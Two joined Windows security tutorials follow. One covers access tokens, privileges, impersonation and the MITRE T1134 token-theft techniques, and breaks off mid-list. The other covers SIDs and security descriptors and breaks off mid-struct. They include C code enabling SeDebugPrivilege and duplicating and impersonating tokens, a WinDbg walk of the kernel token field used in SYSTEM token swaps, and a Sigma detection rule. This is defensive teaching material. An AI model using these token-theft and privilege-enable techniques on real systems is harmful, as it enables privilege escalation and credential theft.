Access Tokens and Privileges: The Kernel’s Security Context

Run whoami /priv in an elevated admin shell. You’ll see a column labeled State, and most of the entries, including SeDebugPrivilege and SeBackupPrivilege, read Disabled. They aren’t missing. They’re sitting in the token, dormant, waiting for a flag flip. That single column captures most Windows post-exploitation tradecraft in one place: not forging anything, just enabling what was already issued.

Objective: Understand how Windows builds and enforces a per-process security context through the access token, how the Security Reference Monitor uses that token on every object access, and which token operations defenders need to see to catch impersonation, theft, and privilege enablement.


1. Why Tokens Exist

When you authenticate, LSASS (lsass.exe) creates a logon session, derives a primary access token from that session, and hands it to whatever process is being started for you — userinit.exe, then explorer.exe. From that point forward, every kernel object you touch — files, registry keys, named pipes, processes, threads — is evaluated against that token by the Security Reference Monitor (SRM).

The SRM lives in the kernel and does one job: when a thread asks for access to an object, compare the thread’s effective token to the object’s security descriptor and return a yes/no. That comparison happens in SeAccessCheck (kernel) and is surfaced to user mode as AccessCheck. The order matters — Integrity Level check → DACL check → Privilege check.

Without a token, the kernel has no answer to “who is this thread, and what is it allowed to do?” Tokens aren’t a wrapper around credentials. They are the runtime identity.

Flow diagram showing LSASS authentication creating a logon session, deriving a primary token, attaching it to a process, and the Security Reference Monitor performing SeAccessCheck in order: Integrity Level, DACL, Privilege.
From authentication to access decision: the primary token is the runtime identity the SRM consults on every object request.

2. Inside nt!_TOKEN

The kernel object is nt!_TOKEN. It’s undocumented — Microsoft exposes Win32 wrappers, not field layouts — but you can inspect it on your own build:

0: kd> dt nt!_TOKEN

The layout shifts between Windows versions, so never hardcode offsets. The fields that matter conceptually are stable:

| Field | Purpose |
|---|---|
| TokenId | LUID uniquely identifying this token instance |
| AuthenticationId | LUID of the originating logon session |
| TokenType | TokenPrimary (1) or TokenImpersonation (2) |
| ImpersonationLevel | Only meaningful for impersonation tokens |
| UserAndGroups | Array of SID_AND_ATTRIBUTES: user SID plus group SIDs |
| Privileges | SEP_TOKEN_PRIVILEGES: three 64-bit privilege bitmasks |
| IntegrityLevelIndex | Index into UserAndGroups pointing at the mandatory label |
| LogonSession | Pointer to SEP_LOGON_SESSION_REFERENCES |
| DefaultDacl | DACL applied to objects this token creates |
| SessionId | RDP / Terminal Services session ID |

The Privileges member is worth dwelling on. SEP_TOKEN_PRIVILEGES carries three 64-bit bitmasks — Present, Enabled, and EnabledByDefault — and that three-state design is the entire reason “privilege escalation” can be a one-API-call affair (covered in §6). This layout is community-observed via WinDbg and ReactOS source; treat it as undocumented and verify on your target build.
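
To make the three-bitmask design concrete, here is a minimal, portable C model of it. It is not the kernel structure: PrivModel, the PRIV_* bit positions, and the priv_* helpers are hypothetical names invented for illustration, and the real SEP_TOKEN_PRIVILEGES layout should be checked on your own build. The sketch only shows why enabling is a bit flip, and why it cannot succeed for a privilege that is missing from Present.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical stand-in for SEP_TOKEN_PRIVILEGES: one bit per privilege. */
typedef struct {
    uint64_t present;            /* privileges issued to the token       */
    uint64_t enabled;            /* privileges currently active          */
    uint64_t enabled_by_default; /* state the token started in           */
} PrivModel;

/* Bit positions are arbitrary for this sketch. */
#define PRIV_DEBUG        (1ULL << 20)
#define PRIV_IMPERSONATE  (1ULL << 29)

/* Enable only what is already Present.
   Returns the requested bits that could NOT be assigned (0 = all assigned). */
uint64_t priv_enable(PrivModel *t, uint64_t want) {
    t->enabled |= (want & t->present);
    return want & ~t->present;
}

/* Disable leaves the privilege Present, so it can be enabled again later. */
void priv_disable(PrivModel *t, uint64_t mask) {
    t->enabled &= ~mask;
}

/* Remove clears every mask; nothing in this model can set Present again. */
void priv_remove(PrivModel *t, uint64_t mask) {
    t->present            &= ~mask;
    t->enabled            &= ~mask;
    t->enabled_by_default &= ~mask;
}

/* An access check only honors privileges that are currently Enabled. */
bool priv_check(const PrivModel *t, uint64_t mask) {
    return (t->enabled & mask) == mask;
}
```

Starting from a token whose present mask holds only PRIV_DEBUG, priv_enable(&t, PRIV_DEBUG) returns 0 and the check passes, while asking for PRIV_IMPERSONATE returns the unassigned bit and changes nothing. That second outcome is the model’s analogue of the ERROR_NOT_ALL_ASSIGNED case covered in §6.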

Hierarchy diagram of the nt!_TOKEN kernel structure, branching into Identity fields, Type and Impersonation Level, UserAndGroups SID array, SEP_TOKEN_PRIVILEGES with three bitmasks, Integrity Level index, and Logon Session pointer.
The nt!_TOKEN structure: the three-bitmask SEP_TOKEN_PRIVILEGES field (Present, Enabled, EnabledByDefault) is the mechanism behind most privilege-escalation tradecraft.

3. Primary vs. Impersonation Tokens

Every process has exactly one primary token, set at CreateProcess time and fixed for the lifetime of the process. You don’t swap it. To run code under a different identity, you start a new process with a different token (CreateProcessAsUser, CreateProcessWithTokenW).

Threads are different. A thread can carry an impersonation token that temporarily overrides the process’s primary token for that thread only. This is how RPC servers, named-pipe servers, and IIS worker threads handle requests on behalf of multiple callers without spawning a process each time. The kernel tracks it on the thread object (_ETHREAD; the field name varies by build, so confirm it with dt nt!_ETHREAD); SeAccessCheck prefers the thread token over the process token if one is present.

The distinction matters at detection time too. OpenProcessToken returns the primary token; OpenThreadToken returns the impersonation token, if any. A thread calling OpenThreadToken and getting ERROR_NO_TOKEN is normal — most threads aren’t impersonating. A thread calling it and getting SYSTEM is not.

Graph diagram contrasting a process primary token stored in _EPROCESS with a per-thread impersonation token stored on the thread object (_ETHREAD), showing the SRM preferring the thread token when present.
The SRM always prefers a thread’s impersonation token over the process primary token, making per-thread identity the key primitive for RPC and pipe servers.
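
The selection rule can be written down in a few lines. The sketch below is a portable C model, not kernel code: TokenModel, ProcessModel, ThreadModel, and effective_token are hypothetical names, and the only behavior it claims to show is "use the thread’s impersonation token if there is one, otherwise fall back to the process’s primary token."

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical, simplified stand-ins for the kernel objects. */
typedef struct { const char *user; } TokenModel;

typedef struct {
    const TokenModel *primary;        /* fixed for the life of the process */
} ProcessModel;

typedef struct {
    const ProcessModel *process;
    const TokenModel   *impersonation; /* NULL when the thread is not impersonating */
} ThreadModel;

/* The token an access check would run against for this thread. */
const TokenModel *effective_token(const ThreadModel *t) {
    return t->impersonation ? t->impersonation : t->process->primary;
}
```

Setting impersonation to a client token and later resetting it to NULL mirrors the impersonate-then-revert pattern: the primary token never changes, only which token the thread presents.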

4. Integrity Levels and Mandatory Integrity Control

Mandatory Integrity Control (MIC) added a sideband label to the token and a corresponding mandatory label ACE in object SACLs. Five well-known integrity SIDs cover the practical range:

| SID | Level | Typical Use |
|---|---|---|
| S-1-16-0 | Untrusted | Heavily sandboxed code |
| S-1-16-4096 | Low | Browser renderers, AppContainer |
| S-1-16-8192 | Medium | Default for interactive user processes |
| S-1-16-12288 | High | Elevated (post-UAC) admin processes |
| S-1-16-16384 | System | SYSTEM-account services and kernel components |

The label sits in UserAndGroups at index IntegrityLevelIndex, retrievable from user mode via GetTokenInformation(..., TokenIntegrityLevel, ...) into a TOKEN_MANDATORY_LABEL. MIC’s enforcement rule is simple: a process at a lower integrity level cannot write to or modify a higher-integrity object belonging to the same user — no DLL injection, no token impersonation up the chain. That single rule is what stops a Medium-IL Word process from injecting into a High-IL elevated PowerShell.
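
The no-write-up rule reduces to a comparison of integrity RIDs. The following is a minimal portable C sketch under that assumption; integrity_name and mic_allows_write are hypothetical helper names, and the model deliberately ignores everything else that happens afterwards (the DACL check still applies even when MIC lets the write through).

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Integrity RIDs: the last sub-authority of the S-1-16-* label SIDs. */
enum {
    IL_UNTRUSTED = 0,
    IL_LOW       = 4096,
    IL_MEDIUM    = 8192,
    IL_HIGH      = 12288,
    IL_SYSTEM    = 16384
};

/* Buckets a RID into the nearest well-known level at or below it. */
const char *integrity_name(uint32_t rid) {
    if (rid >= IL_SYSTEM) return "System";
    if (rid >= IL_HIGH)   return "High";
    if (rid >= IL_MEDIUM) return "Medium";
    if (rid >= IL_LOW)    return "Low";
    return "Untrusted";
}

/* No-write-up: MIC lets a write proceed only if the caller's level is
   at least the object's level. */
bool mic_allows_write(uint32_t caller_rid, uint32_t object_rid) {
    return caller_rid >= object_rid;
}
```

Under this model, mic_allows_write(IL_MEDIUM, IL_HIGH) is false, which is the Medium-IL Word versus High-IL PowerShell case described above, while the reverse direction is allowed.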

5. Reading a Token from User Mode

The minimum useful query: open the token, ask for the user SID, print it.

// Requires <windows.h>, <sddl.h>, <stdio.h>; link with advapi32.
HANDLE hToken = NULL;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
    return GetLastError();
}

// The first call is expected to fail; it only reports the buffer size needed.
DWORD cbUser = 0;
GetTokenInformation(hToken, TokenUser, NULL, 0, &cbUser);
PTOKEN_USER pUser = (PTOKEN_USER)LocalAlloc(LPTR, cbUser);

if (pUser && GetTokenInformation(hToken, TokenUser, pUser, cbUser, &cbUser)) {
    LPWSTR sidStr = NULL;
    if (ConvertSidToStringSidW(pUser->User.Sid, &sidStr)) {
        wprintf(L"User SID: %ls\n", sidStr);
        LocalFree(sidStr);   // the string is allocated by the API
    }
}

LocalFree(pUser);            // LocalFree(NULL) is a no-op
CloseHandle(hToken);

The same GetTokenInformation call with TokenGroups returns a TOKEN_GROUPS you can walk to see which groups are SE_GROUP_ENABLED, SE_GROUP_MANDATORY, or SE_GROUP_INTEGRITY (that last flag is how you find the IL label without parsing the index). TokenPrivileges returns a TOKEN_PRIVILEGES and feeds the next section.

For integrity level specifically:

DWORD cb = 0;
GetTokenInformation(hToken, TokenIntegrityLevel, NULL, 0, &cb);
PTOKEN_MANDATORY_LABEL pLabel = (PTOKEN_MANDATORY_LABEL)LocalAlloc(LPTR, cb);

DWORD rid = 0;
if (pLabel && GetTokenInformation(hToken, TokenIntegrityLevel, pLabel, cb, &cb)) {
    // The integrity RID is the last sub-authority of the label SID.
    rid = *GetSidSubAuthority(
        pLabel->Label.Sid,
        (DWORD)(UCHAR)(*GetSidSubAuthorityCount(pLabel->Label.Sid) - 1));
}
LocalFree(pLabel);

// rid == 0x1000 (4096)  -> Low
// rid == 0x2000 (8192)  -> Medium
// rid == 0x3000 (12288) -> High
// rid == 0x4000 (16384) -> System

6. Privileges: Present, Enabled, Removed

Three terms describe where a privilege stands inside the token:

  • Present — the privilege exists in the token. Cannot be added at runtime by user mode.
  • Enabled — the privilege is currently active for access checks.
  • Removed — once a privilege is removed via SE_PRIVILEGE_REMOVED, it’s gone for the life of the token.

AdjustTokenPrivileges can enable or disable a privilege that is already present, or remove it for good with SE_PRIVILEGE_REMOVED. It cannot grant a privilege the token never had. So when a tool “enables SeDebugPrivilege,” it isn’t gaining authority; that authority was issued at logon and was waiting in the Present bitmask. The enable is purely a flag flip.

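HANDLE hToken = NULL;
LUID  luid;
TOKEN_PRIVILEGES tp = {0};

if (!OpenProcessToken(GetCurrentProcess(),
                      TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
                      &hToken)) {
    return GetLastError();
}

if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) {
    DWORD lookupErr = GetLastError();   // save before CloseHandle can overwrite it
    CloseHandle(hToken);
    return lookupErr;
}

tp.PrivilegeCount           = 1;
tp.Privileges[0].Luid       = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

// The call returns TRUE even if nothing was enabled, so always read GetLastError().
BOOL  ok  = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
DWORD err = GetLastError();
CloseHandle(hToken);

if (!ok) return err;
if (err == ERROR_NOT_ALL_ASSIGNED) {
    // Privilege wasn't Present in the token -> not actually enabled.
}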

That ERROR_NOT_ALL_ASSIGNED check is the gotcha most first-timers miss: AdjustTokenPrivileges returns TRUE even when the privilege isn’t in Present. The real outcome is only visible through GetLastError. I’ve burned a solid afternoon staring at a “successful” call that did nothing because the calling process was unelevated and SeDebugPrivilege was never issued in the first place.

The privileges worth keeping at the top of a defender’s list:

| Privilege | Why It Matters |
|---|---|
| SeDebugPrivilege | Open any process, including LSASS, for read/write |
| SeImpersonatePrivilege | Precondition for the Potato family of escalations |
| SeAssignPrimaryTokenPrivilege | Replace a process’s primary token |
| SeTcbPrivilege | “Act as part of the OS”: essentially unrestricted |
| SeLoadDriverPrivilege | Load arbitrary kernel drivers → BYOVD |
| SeBackupPrivilege / SeRestorePrivilege | Read/write any file regardless of DACL |
| SeTakeOwnershipPrivilege | Seize ownership of any object |
| SeCreateTokenPrivilege | Forge tokens directly; held only by SYSTEM |

7. Impersonation in Depth

SECURITY_IMPERSONATION_LEVEL defines how far the impersonating thread can act on behalf of the original principal:

| Level | Meaning |
|---|---|
| SecurityAnonymous | Server cannot identify or impersonate the client |
| SecurityIdentification | Server can identify but not act as the client |
| SecurityImpersonation | Server can act as the client on the local machine |
| SecurityDelegation | Server can act as the client on local and remote systems |

The canonical sequence for a service impersonating a caller:

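// hSourceToken: a token handle opened with TOKEN_DUPLICATE (obtained elsewhere).
HANDLE hClient = NULL;
if (!DuplicateTokenEx(hSourceToken,
                      TOKEN_QUERY | TOKEN_IMPERSONATE,  // SetThreadToken needs TOKEN_IMPERSONATE
                      NULL,
                      SecurityImpersonation,
                      TokenImpersonation,
                      &hClient)) {
    return GetLastError();
}

if (SetThreadToken(NULL, hClient)) {   // current thread now runs as the client
    // ... perform the work that requires the client's identity ...
    RevertToSelf();                    // back to the process's primary token
}
CloseHandle(hClient);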

SECURITY_QUALITY_OF_SERVICE controls whether impersonation tracks the source statically or dynamically (ContextTrackingMode), and whether only the enabled privileges follow (EffectiveOnly). That last flag is one of the more interesting defensive levers: when an impersonation context is established with EffectiveOnly = TRUE, dormant privileges are stripped out of it entirely.
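
The level table and the EffectiveOnly flag can both be expressed as small predicates. This is a portable C sketch, not the Win32 API: LevelModel, the server_can_* helpers, and impersonated_present are hypothetical names, and the privilege masks are plain 64-bit integers standing in for the token’s Present and Enabled bitmasks.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Mirrors the ordering of SECURITY_IMPERSONATION_LEVEL (0 through 3). */
typedef enum {
    LEVEL_ANONYMOUS      = 0,
    LEVEL_IDENTIFICATION = 1,
    LEVEL_IMPERSONATION  = 2,
    LEVEL_DELEGATION     = 3
} LevelModel;

/* Each capability unlocks at a given level and stays unlocked above it. */
bool server_can_identify(LevelModel l)     { return l >= LEVEL_IDENTIFICATION; }
bool server_can_act_locally(LevelModel l)  { return l >= LEVEL_IMPERSONATION; }
bool server_can_act_remotely(LevelModel l) { return l == LEVEL_DELEGATION; }

/* EffectiveOnly: only privileges that are enabled right now survive into
   the impersonation context; dormant ones are dropped. */
uint64_t impersonated_present(uint64_t present, uint64_t enabled, bool effective_only) {
    return effective_only ? (present & enabled) : present;
}
```

For a source token with present = 0x7 and enabled = 0x1, the impersonation context keeps all three privileges without EffectiveOnly and only the one enabled privilege with it, so there is nothing left for the server to switch on later.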

8. Duplication, LogonUser, and Process Creation Under a Token

Three primitives cover most of the “run something as someone else” surface:

  • DuplicateTokenEx — clone an existing token, optionally upgrading from impersonation to primary type. Requires TOKEN_DUPLICATE on the source.
  • LogonUser — authenticate a username/password and receive a fresh primary token tied to a new logon session.
  • CreateProcessWithTokenW — start a new process whose primary token is the one you pass in. Requires SeImpersonatePrivilege on the caller.

The MITRE taxonomy splits the abuse cleanly along these primitives:

  • T1134.001 — Token Impersonation/Theft. OpenProcessToken against a higher-privileged process, DuplicateTokenEx, then ImpersonateLoggedOnUser or SetThreadToken. No credentials needed; you steal what’s already running.
  • T1134.002 — Create Process with Token. Same theft, but you go straight to CreateProcessWithTokenW to start a new process under the stolen identity rather than impersonating on a thread.
  • T1134.003 — Make and Impersonate Token. LogonUser with credentials in hand, then SetThreadToken. Quieter than theft because the resulting logon looks legitimate — but it generates a 4624 you can see.
Flow diagram mapping token abuse primitives: OpenProcessToken feeding DuplicateTokenEx which branches to thread impersonation (T1134.001) or CreateProcessWithTokenW (T1134.002), and LogonUser feeding SetThreadToken (T1134.003).
The three MITRE T1134 sub-techniques map directly onto three token API primitives — theft via duplication, new process under stolen token, or fresh token from explicit credentials.

9. _EPROCESS.Token and Kernel-Mode Abuse

The kernel’s view of a process’s primary token is the Token field in _EPROCESS, an EX_FAST_REF — a pointer with reference-count bits packed into the low bits. A kernel exploit with arbitrary write can overwrite that field with a pointer to the SYSTEM process’s token, instantly upgrading the attacker’s process to SYSTEM without touching any user-mode API.

Walking it in WinDbg looks like this:

0: kd> !process 0 0 explorer.exe
PROCESS ffffba0c1a5f6080 ...
0: kd> dt nt!_EPROCESS ffffba0c1a5f6080 Token
   +0x4b8 Token : _EX_FAST_REF
0: kd> dt nt!_TOKEN (poi(ffffba0c1a5f6080+0x4b8) & ~0xf)

The offset will not be 0x4b8 on your build. Use dt to find it on the system you’re analyzing.
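
The masking step in that last command is easy to reproduce outside the debugger. Below is a small portable C sketch of it, assuming a 64-bit build where the low 4 bits of an EX_FAST_REF hold the reference count; FAST_REF_MASK, fast_ref_object, and fast_ref_count are hypothetical names, and any raw value you feed in is whatever you read from your own target.

```c
#include <assert.h>
#include <stdint.h>

/* Assumption: x64, where the low 4 bits of EX_FAST_REF carry the ref count. */
#define FAST_REF_MASK 0xFULL

/* Strip the packed reference count to recover the object pointer. */
uint64_t fast_ref_object(uint64_t value) {
    return value & ~FAST_REF_MASK;
}

/* Extract the packed reference count on its own. */
unsigned fast_ref_count(uint64_t value) {
    return (unsigned)(value & FAST_REF_MASK);
}
```

Given a made-up raw field value of 0xffffa58f1c2d4067, the token object would sit at 0xffffa58f1c2d4060 with a packed count of 7. Forgetting the mask and dereferencing the raw value is a common source of garbage dt output.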

For defenders, the operational takeaway is that kernel-mode token swapping leaves no user-mode footprint — no AdjustTokenPrivileges, no OpenProcessToken, no 4703. The detection has to shift earlier: catch the driver load (SeLoadDriverPrivilege use, signed-driver loader events) or the exploit’s user-mode loader, because by the time the swap happens your audit pipeline is blind to it.


10. Detection and Defense

Token abuse leaves observable traces across the Security log, Sysmon, and ETW. Pick the events that match the primitive you’re hunting.

Windows Security Audit Events

| Event ID | Name | What It Tells You |
|---|---|---|
| 4624 | Successful logon | New logon session and primary token; check LogonType |
| 4648 | Logon with explicit credentials | runas, CreateProcessWithLogonW, lateral movement |
| 4672 | Special privileges assigned to new logon | Sensitive privileges granted at session start |
| 4673 | Privileged service called | Use of sensitive privilege |
| 4688 | New process created | Includes TokenElevationType (1/2/3) |
| 4703 | User right adjusted | AdjustTokenPrivileges calls: the core privilege-enable signal |

4672 is high-value: it fires once per privileged logon and lists the sensitive privileges assigned. Filter out the well-known principals (LOCAL SYSTEM, NETWORK SERVICE, LOCAL SERVICE) and expected admins. What’s left is worth a look — that’s where Mimikatz-style pass-the-hash and elevation activity surfaces.

Sysmon

  • EID 1 (Process Create): IntegrityLevel and User fields directly show the process’s effective token. A child of a Medium-IL process suddenly running at System integrity is a hard signal.
  • EID 10 (ProcessAccess): OpenProcess against LSASS or other high-value targets. Watch GrantedAccess masks like 0x1400 (PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION) and 0x40 (PROCESS_DUP_HANDLE).
  • EID 8 (CreateRemoteThread): cross-process injection that frequently follows token theft.
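
GrantedAccess values in EID 10 are just OR-ed process access rights, so decoding them is a table lookup. The sketch below is portable C with the process-specific right values copied from winnt.h; AccessBit, kProcessRights, and decode_process_access are hypothetical names, and the table intentionally leaves out the standard rights (SYNCHRONIZE, READ_CONTROL, and so on), which come back as unnamed leftover bits.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct { uint32_t bit; const char *name; } AccessBit;

/* Process-specific access rights, values as defined in winnt.h. */
static const AccessBit kProcessRights[] = {
    {0x0001, "PROCESS_TERMINATE"},
    {0x0002, "PROCESS_CREATE_THREAD"},
    {0x0008, "PROCESS_VM_OPERATION"},
    {0x0010, "PROCESS_VM_READ"},
    {0x0020, "PROCESS_VM_WRITE"},
    {0x0040, "PROCESS_DUP_HANDLE"},
    {0x0080, "PROCESS_CREATE_PROCESS"},
    {0x0100, "PROCESS_SET_QUOTA"},
    {0x0200, "PROCESS_SET_INFORMATION"},
    {0x0400, "PROCESS_QUERY_INFORMATION"},
    {0x0800, "PROCESS_SUSPEND_RESUME"},
    {0x1000, "PROCESS_QUERY_LIMITED_INFORMATION"},
};

/* Writes "A | B | ..." into out and returns the bits it could not name. */
uint32_t decode_process_access(uint32_t mask, char *out, size_t cap) {
    uint32_t left = mask;
    size_t used = 0;
    if (cap) out[0] = '\0';
    for (size_t i = 0; i < sizeof kProcessRights / sizeof kProcessRights[0]; i++) {
        if (!(mask & kProcessRights[i].bit)) continue;
        int n = snprintf(out + used, cap - used, "%s%s",
                         used ? " | " : "", kProcessRights[i].name);
        if (n < 0 || (size_t)n >= cap - used) break;   /* buffer too small */
        used += (size_t)n;
        left &= ~kProcessRights[i].bit;
    }
    return left;
}
```

Decoding 0x1400 yields "PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION" with no leftover bits, matching the mask called out above. A non-zero return value means the mask carried rights outside this table and deserves a second look.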

Sigma Sketch: Privilege Enable on a Sensitive Right

title: Sensitive Privilege Adjusted via AdjustTokenPrivileges
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4703
    EnabledPrivilegeList|contains:
      - 'SeDebugPrivilege'
      - 'SeImpersonatePrivilege'
      - 'SeTcbPrivilege'
      - 'SeLoadDriverPrivilege'
  filter_known:
    SubjectUserSid:
      - 'S-1-5-18'   # LOCAL SYSTEM
      - 'S-1-5-19'   # LOCAL SERVICE
      - 'S-1-5-20'   # NETWORK SERVICE
  condition: selection and not filter_known
level: high

To produce 4703, the Audit Token Right Adjusted subcategory has to be enabled — it isn’t by default on most builds. Same goes for Audit Sensitive Privilege Use for 4673/4674, and command-line logging in 4688 (Group Policy: System → Audit Process Creation → Include command line).

ETW Providers

| Provider | What It Carries |
|---|---|
| Microsoft-Windows-Security-Auditing | All audit events above |
| Microsoft-Windows-Kernel-Process | Process/thread lifecycle including token assignment |
| Microsoft-Windows-Threat-Intelligence | High-fidelity process-access telemetry; PPL consumer only (Defender/EDR) |

Hardening

  • SeCreateTokenPrivilege → SYSTEM only. Nothing else needs it.
  • SeAssignPrimaryTokenPrivilege → local/network service accounts only. Audit anything else holding it.
  • Strip SeImpersonatePrivilege from service accounts that don’t host RPC or named-pipe endpoints. Its presence is the precondition for the Potato family.
  • PPL for critical services — blocks OpenProcess with token-access rights from unprotected callers.
  • Credential Guard — isolates logon-session secrets in VSM,


SIDs and Security Descriptors: Identity in Windows Security

A thread opens a handle to a file. Before a single byte is read, the kernel has already answered a question nobody typed: is the caller’s identity allowed to do this? That answer lives at the intersection of two structures — the SID that names who you are, and the security descriptor that says who gets in. Get the relationship between them wrong and you ship a world-writable service. Understand it, and most “weird permission” incidents stop being mysterious.

Objective: Understand how Windows represents identity with Security Identifiers, how Security Descriptors bind owners, DACLs, and SACLs to every securable object, and how attackers abuse — and defenders detect — manipulation of both.


1. Identity Before Access

Windows authenticates security principals — anything the OS can prove an identity for: users, groups, computers, and service accounts. Authentication is the LSA’s job; the SAM (local) or the domain’s NTDS.dit (Active Directory) stores the account records. But authentication only proves who you are. Authorization — what you may touch — is a separate decision made against a different value: the SID.

A SID is the canonical, machine-readable name for a principal. Display names change. SAM account names get reused. SIDs do not. Once the system mints a SID at account-creation time, that value is never reused to identify another principal, even after the account is deleted. Every authorization check in the OS compares SIDs, never names.


2. Anatomy of a SID

A SID is a variable-length binary structure, defined as SID in winnt.h. Three logical parts: a revision, the issuing authority, and a chain of sub-authorities ending in a Relative Identifier (RID).

| Field | Type | Meaning |
|---|---|---|
| Revision | BYTE | SID structure version, always 1 |
| SubAuthorityCount | BYTE | Number of sub-authority values (max 15) |
| IdentifierAuthority | SID_IDENTIFIER_AUTHORITY | 6-byte top-level authority that issued the SID |
| SubAuthority[] | DWORD[] | Sub-authority values; the last element is the RID |

The string notation everyone recognizes is just those fields, hyphenated. Take S-1-5-21-<d1>-<d2>-<d3>-513:

  • S-1: a revision-1 SID.
  • 5: SECURITY_NT_AUTHORITY, marking it a Windows NT SID.
  • 21: SECURITY_NT_NON_UNIQUE, signaling that a domain identifier follows.
  • <d1>-<d2>-<d3>: three 32-bit values randomly generated to uniquely identify the domain.
  • 513: the RID; here, the well-known RID for Domain Users.
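
The breakdown above can be checked mechanically by splitting a string SID on its hyphens. What follows is a minimal portable C sketch, not the Win32 ConvertStringSidToSid routine: ParsedSid, parse_sid, and sid_rid are hypothetical names, and the parser only handles the plain decimal form (no SDDL aliases such as BA, no hexadecimal authority).

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>

#define SID_MAX_SUBAUTH 15

typedef struct {
    unsigned revision;
    uint64_t authority;              /* 48-bit identifier authority  */
    unsigned sub_count;
    uint32_t sub[SID_MAX_SUBAUTH];   /* last used element is the RID */
} ParsedSid;

/* Reads one unsigned decimal number and advances *p past it. */
static int read_number(const char **p, unsigned long long *v) {
    char *end;
    if (**p < '0' || **p > '9') return -1;
    *v = strtoull(*p, &end, 10);
    *p = end;
    return 0;
}

/* Parses "S-R-A-S1-S2-...". Returns 0 on success, -1 on malformed input. */
int parse_sid(const char *s, ParsedSid *out) {
    unsigned long long v;
    if (s[0] != 'S' || s[1] != '-') return -1;
    s += 2;
    if (read_number(&s, &v) || *s != '-') return -1;
    out->revision = (unsigned)v;
    s++;
    if (read_number(&s, &v)) return -1;
    out->authority = v;
    out->sub_count = 0;
    while (*s == '-') {
        s++;
        if (out->sub_count == SID_MAX_SUBAUTH) return -1;
        if (read_number(&s, &v) || v > 0xFFFFFFFFULL) return -1;
        out->sub[out->sub_count++] = (uint32_t)v;
    }
    return *s == '\0' ? 0 : -1;
}

/* The RID is simply the last sub-authority. */
uint32_t sid_rid(const ParsedSid *sid) {
    assert(sid->sub_count > 0);
    return sid->sub[sid->sub_count - 1];
}
```

Parsing S-1-5-21-1004336348-1177238915-682003330-513 gives revision 1, authority 5, five sub-authorities starting with 21, and a RID of 513. The domain portion in that string is only an example value.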

You rarely build SIDs by hand. You parse them. Here’s the field-level walk in C — note that the documented accessors (GetSidSubAuthority, GetSidIdentifierAuthority) return pointers into the structure, which trips up everyone the first time:

#include <windows.h>
#include <sddl.h>
#include <stdio.h>

void PrintSid(PSID pSid) {
    if (!IsValidSid(pSid)) return;

    PSID_IDENTIFIER_AUTHORITY pAuth = GetSidIdentifierAuthority(pSid);
    DWORD subCount = *GetSidSubAuthorityCount(pSid);

    printf("Authority: %lu\n", (DWORD)pAuth->Value[5]); // for NT authority (5), the value sits in the last byte
    for (DWORD i = 0; i < subCount; i++)
        printf("  SubAuthority[%lu] = %lu\n", i, *GetSidSubAuthority(pSid, i));

    LPSTR str = NULL;
    if (ConvertSidToStringSidA(pSid, &str)) {       // -> "S-1-5-..."
        printf("String SID: %s\n", str);
        LocalFree(str);
    }
}

To go the other direction — constructing a known SID — use AllocateAndInitializeSid, which takes an authority plus up to eight sub-authorities. Building the SYSTEM SID (S-1-5-18) and comparing it with EqualSid is the idiomatic way to check “am I running as LocalSystem?”:

SID_IDENTIFIER_AUTHORITY ntAuth = SECURITY_NT_AUTHORITY; // {0,0,0,0,0,5}
PSID pSystem = NULL;

if (AllocateAndInitializeSid(&ntAuth, 1,
        SECURITY_LOCAL_SYSTEM_RID,   // 18
        0, 0, 0, 0, 0, 0, 0, &pSystem)) {
    // EqualSid(tokenSid, pSystem) -> TRUE means LocalSystem
    FreeSid(pSystem);                // never free this with LocalFree
}

3. Well-Known SIDs and Built-in Principals

Some SIDs are identical on every Windows install. Hard-coding the account names behind them is a bug waiting to happen, because those names are localized; match on the SID itself, and build it from the documented constants where you can (for example with CreateWellKnownSid). Memorize the ones below anyway, because you’ll read them in logs daily.

| SID | Principal |
|---|---|
| S-1-0-0 | Null SID (a group with no members) |
| S-1-1-0 | Everyone |
| S-1-5-18 | Local System |
| S-1-5-19 | Local Service |
| S-1-5-20 | Network Service |
| S-1-5-32-544 | Builtin\Administrators |
| S-1-16-12288 | High mandatory integrity level |

Built-in accounts also carry well-known RIDs appended to the domain or machine SID: 500 is Administrator, 501 is Guest, 512 is Domain Admins. An attacker enumerating a domain looks for RID 500 and 512 specifically — the display name can be renamed, the RID cannot. Capability SIDs the OS recognizes are cached under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\CapabilityClasses\AllCachedCapabilities.


4. SIDs at Runtime: The Access Token

When a user signs in, LSA builds an access token for the session. That token is the runtime bag of identity: the user’s SID, the SIDs of every group the user belongs to, the privileges granted, and a mandatory integrity level SID (the S-1-16-* family). Every process started in that logon context inherits a copy. When code makes an access check, the kernel compares the SIDs in the token against the SIDs in the object’s DACL.

One detail that becomes an attack surface later: an account can carry extra SIDs in its Active Directory sIDHistory attribute. That attribute exists for legitimate domain migration: copy the old SID into sIDHistory so a migrated user keeps access to resources permissioned to the old account without re-ACLing everything. The catch is that all values in sIDHistory are added to the access token at logon and are honored in access checks exactly like the account’s own SID and group memberships.


Flowchart showing how LSA mints an access token at logon, the token is inherited by processes, and the Security Reference Monitor compares token SIDs against an object DACL to produce a granted access mask
Every handle open flows through SeAccessCheck, which compares the caller’s token SIDs against the target object’s DACL top-to-bottom before returning a granted-access mask.

5. The Security Descriptor: Structure and Fields

Every object the Object Manager creates has a security descriptor. The structure is SECURITY_DESCRIPTOR, reproduced here verbatim from winnt.h:

typedef struct _SECURITY_DESCRIPTOR {
  BYTE                        Revision;
  BYTE                        Sbz1;
  SECURITY_DESCRIPTOR_CONTROL Control;
  PSID                        Owner;
  PSID                        Group;
  PACL                        Sacl;
  PACL                        Dacl;
